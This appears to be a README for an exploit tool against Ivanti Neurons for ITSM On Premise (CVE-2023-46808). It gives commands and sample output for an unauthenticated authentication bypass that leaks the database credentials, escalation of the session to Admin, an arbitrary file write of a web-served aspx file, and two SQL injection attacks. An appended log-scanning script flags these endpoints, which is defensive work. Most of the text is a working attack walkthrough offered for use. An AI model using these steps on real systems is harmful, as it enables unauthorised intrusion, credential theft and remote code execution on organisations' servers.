Exploits for Ivanti Neurons for ITSM (On Premise)

This script exploits several flaws that allow an unauthenticated attacker to gain administrator access and execute remote commands (CVE-2023-46808) on Ivanti Neurons for ITSM (On Premise).

For technical details, see Technical Details

Affected versions

Versions 2021.1.0.2021060601 to 2020.4.0.2021033001 are affected; earlier versions are likely to be vulnerable as well.

Usage

Install requirements:

pip install requests defusedxml

List tenants

python3 ivanti-itsm-exploit.py  -u http://<target> --list-tenants
[2025-08-10 21:04:18] [*] Listing tenants: http://<target>/HEAT/
[2025-08-10 21:04:18] [*] [+] Tenants found:
- CentralConfig
- WIN-ITSM

Authentication Bypass

python3 ivanti-itsm-exploit.py -v  -u http://<target> -t WIN-ITSM --auth-bypass

[2025-08-10 21:07:43] [*] Bypassing authentication: http://<target>/HEATSurveyProxy/SaaSSurvey.asmx
HTTP RESPONSE:
<?xml version="1.0" ?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
	<soap:Body>
		<AuthenticateAPIResponse xmlns="http://www.frontrange.com/WebSurvey/">
			<AuthenticateAPIResult>
				<TenantId>WIN-ITSM</TenantId>
				<LoginId>HEATAdmin</LoginId>
				<SessionId>OMJC56DSECOCHU6UT9SKGVLP0VLF00U6</SessionId>
				<ConnectionString>server=WIN-ITSM;Integrated Security=False;MultipleActiveResultSets=True;user id=sa;password=Password123;initial catalog=HEATSM</ConnectionString>
				<ProviderName>System.Data.SqlClient</ProviderName>
				<UseServerTimeZone>false</UseServerTimeZone>
				<SessionKey>WIN-ITSM#OMJC56DSECOCHU6UT9SKGVLP0VLF00U6#1</SessionKey>
				<SessionKeyExpire>638915620626330227</SessionKeyExpire>
				<AuthenticationStatus>Success</AuthenticationStatus>
			</AuthenticateAPIResult>
		</AuthenticateAPIResponse>
	</soap:Body>
</soap:Envelope>

[2025-08-10 21:07:43] [+] Database connection string found: server=WIN-ITSM;Integrated Security=False;MultipleActiveResultSets=True;user id=sa;password=Password123;initial catalog=HEATSM
[2025-08-10 21:07:43] [+] Session key (SID) found: WIN-ITSM#OMJC56DSECOCHU6UT9SKGVLP0VLF00U6#1
[2025-08-10 21:07:43] [*] Add Admin role to session: http://<target>/HEAT/Services/Session.asmx/SelectRole
[2025-08-10 21:07:43] [+] Current role: Admin
[2025-08-10 21:07:43] [+] CSRF Token: lbDMPZLNUCjRdF9tlN8Vry3kr1o

Remote arbitrary file write

python3 ivanti-itsm-exploit.py -v  -u http://<target> -t WIN-ITSM --auth-bypass upload --file a
[...]
[2025-08-10 21:08:55] [*] Add Admin role to session: http://<target>/HEAT/Services/Session.asmx/SelectRole
[2025-08-10 21:08:55] [+] Current role: Admin
[2025-08-10 21:08:55] [+] CSRF Token: GOjTQIMGuCIwjDEXaw2eU-H_tao
[2025-08-10 21:08:55] [*] Adding file in database
HTTP RESPONSE:
<textarea>{"success":true,"msg":"Your file has been uploaded"}</textarea>
[2025-08-10 21:08:55] [*] Writing file connection id: 95489760790959413597285398825941
HTTP RESPONSE:
{"d":null}
[2025-08-10 21:08:55] [*] Checking file path
HTTP RESPONSE:
{"d":"C:\\\\\\\\Program Files\\\\\\\\HEAT Software\\\\\\\\HEAT\\\\\\\\AppServer\\\\\\\\Input\\WIN-ITSM\\"}
[2025-08-10 21:08:55] [+] Success ! File written at: C:\\\\Program Files\\\\HEAT Software\\\\HEAT\\\\AppServer\\\\Input\WIN-ITSM\
[2025-08-10 21:08:55] [+] File URL: /HEAT/Input/WIN-ITSM/Default.aspx

SQL injection

python3 ivanti-itsm-exploit.py -v  -u http://<target> -t WIN-ITSM --auth-bypass sqli-package --sql "SELECT * from master..syslogins WAITFOR DELAY '0:0:20';"
[...]
[2025-08-10 21:13:37] [*] Add Admin role to session: http://<target>/HEAT/Services/Session.asmx/SelectRole
[2025-08-10 21:13:37] [+] Current role: Admin
[2025-08-10 21:13:37] [+] CSRF Token: 74652LoPMbH3uy0Rf42lSDn2aoE
[2025-08-10 21:13:37] [*] Exploiting PackageImportHandler.ashx SQLI : http://<target>/HEAT/AdminUI/handlers/PackageImportHandler.ashx
[2025-08-10 21:13:57] [+] Success ! HTTP RESPONSE:
<html><body>{"completed":true,"applied":true,"errors":[],"warnings":[]}<body></html>

Use ITSM as a client for a remote database:

python3 ivanti-itsm-exploit.py -v  -u http://<target> -t WIN-ITSM --auth-bypass sqli-asset --sql "master..syslogins WAITFOR DELAY '0:0:10'--" -u sa -p Password123 -s WIN-ITSM -d ConfigDB
[...]
[2025-08-10 21:14:27] [+] Session key (SID) found: WIN-ITSM#2OK3EV6F3F73L1KM3A0R0G3S5UA05VHR#1
[2025-08-10 21:14:27] [*] Add Admin role to session: http://<target>/HEAT/Services/Session.asmx/SelectRole
[2025-08-10 21:14:27] [+] Current role: Admin
[2025-08-10 21:14:27] [+] CSRF Token: fnNhibelOJoOxaTihGUd9PG4vXM
[2025-08-10 21:14:27] [*] Exploiting GetAssetXML SQLI : http://<target>/HEAT/AdminUI/services/IntegrationNew.asmx/GetAssetXML
[2025-08-10 21:14:37] [+] Success ! HTTP RESPONSE:
{"d":"Preview failed - SCCMTransformer.GetKeys - Failed to retrieve random key value from SCCM serverSystem.IndexOutOfRangeException: 1\r\n   at System.Data.ProviderBase.FieldNameLookup.GetOrdinal(String fieldName)\r\n   at System.Data.SqlClient.SqlDataReader.GetOrdinal(String name)\r\n   at System.Data.SqlClient.SqlDataReader.get_Item(String name)\r\n   at FrontRange.Integration.Adapter.Container.SCCMContainerBase.GetRandomKey(SCCMAdapterConnectionDef connectionDef)"}
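The output above names every server-side endpoint the tool touches: the pre-authentication AuthenticateAPI call on SaaSSurvey.asmx, the SelectRole call that promotes the session to Admin, the /HEAT/Input/<tenant>/ directory where the written file lands, and the two SQL injection handlers. A defender can turn that into a log check. The following is an added example, not part of the exploit script or of Ivanti's software: it parses IIS W3C access log records (the sample lines are constructed, not captured from a real server, and the field order is an assumption about how the site's logging is configured), flags requests to those endpoints, and reports clients that hit the pre-auth endpoint and then an admin-only one, which is the chain the README's runs show.

```python
"""Scan IIS W3C access-log lines for the Ivanti ITSM endpoints named in this README.

Added example for detection, not the exploit's own code. SAMPLE_LOG is constructed
to mirror the request sequence the README's output shows; FIELDS is an assumed
W3C field selection and must match the server's own #Fields line.
"""
import re
from collections import defaultdict

# Endpoints taken from the README's output, lower-cased for comparison.
SUSPICIOUS_PATHS = {
    "/heatsurveyproxy/saassurvey.asmx": "auth-bypass (AuthenticateAPI)",
    "/heat/services/session.asmx/selectrole": "role escalation (SelectRole)",
    "/heat/adminui/handlers/packageimporthandler.ashx": "SQLi (PackageImportHandler)",
    "/heat/adminui/services/integrationnew.asmx/getassetxml": "SQLi (GetAssetXML)",
}
# A successful file write is served from /HEAT/Input/<tenant>/<file>.aspx.
INPUT_DIR_RE = re.compile(r"^/heat/input/[^/]+/[^/]+\.aspx$")

# Assumed W3C field order (constructed; check against the real #Fields header).
FIELDS = ["date", "time", "s_ip", "method", "uri_stem", "uri_query",
          "port", "username", "c_ip", "user_agent", "status"]

# Constructed sample log: one attacker client walking the README's sequence,
# plus one ordinary user request that must not be flagged.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2025-08-10 21:07:43 10.0.0.5 POST /HEATSurveyProxy/SaaSSurvey.asmx - 80 - 203.0.113.7 python-requests/2.32.3 200
2025-08-10 21:07:43 10.0.0.5 POST /HEAT/Services/Session.asmx/SelectRole - 80 - 203.0.113.7 python-requests/2.32.3 200
2025-08-10 21:08:55 10.0.0.5 GET /HEAT/Input/WIN-ITSM/Default.aspx - 80 - 203.0.113.7 python-requests/2.32.3 200
2025-08-10 21:13:37 10.0.0.5 POST /HEAT/AdminUI/handlers/PackageImportHandler.ashx - 80 - 203.0.113.7 python-requests/2.32.3 200
2025-08-10 21:14:27 10.0.0.5 POST /HEAT/AdminUI/services/IntegrationNew.asmx/GetAssetXML - 80 - 203.0.113.7 python-requests/2.32.3 200
2025-08-10 21:20:01 10.0.0.5 GET /HEAT/Default.aspx - 80 jdoe 192.0.2.14 Mozilla/5.0 200
"""


def parse_iis_line(line):
    """Split one W3C record into a dict; comments, blank and malformed lines give None."""
    if not line or line.startswith("#"):
        return None
    parts = line.split()
    if len(parts) != len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))


def classify(record):
    """Return a short reason if the request targets a README endpoint, else None."""
    path = record["uri_stem"].lower()
    if path in SUSPICIOUS_PATHS:
        return SUSPICIOUS_PATHS[path]
    if INPUT_DIR_RE.match(path):
        return "file served from /HEAT/Input/<tenant>/ (possible written file)"
    return None


def scan(log_text):
    """Return one finding per flagged request: time, client IP, path and reason."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_iis_line(line)
        if rec is None:
            continue
        reason = classify(rec)
        if reason:
            findings.append({
                "time": f"{rec['date']} {rec['time']}",
                "client": rec["c_ip"],
                "path": rec["uri_stem"],
                "reason": reason,
            })
    return findings


def chained_clients(findings):
    """Clients that hit the pre-auth AuthenticateAPI endpoint and at least one
    post-auth endpoint; SelectRole alone is normal for legitimate sessions, so
    only the chain is treated as high confidence."""
    reasons_by_client = defaultdict(set)
    for f in findings:
        reasons_by_client[f["client"]].add(f["reason"])
    return sorted(client for client, reasons in reasons_by_client.items()
                  if "auth-bypass (AuthenticateAPI)" in reasons and len(reasons) > 1)


if __name__ == "__main__":
    results = scan(SAMPLE_LOG)
    for f in results:
        print(f"{f['time']} {f['client']} {f['path']} -> {f['reason']}")
    print("chained clients:", chained_clients(results))
```

Any external request to SaaSSurvey.asmx is worth an alert on its own, since the README shows it is reachable without credentials; the other endpoints are used by legitimate administrators too, so the chain (same client, pre-auth call followed by an admin-only call in a short window) is what separates the exploit from normal use.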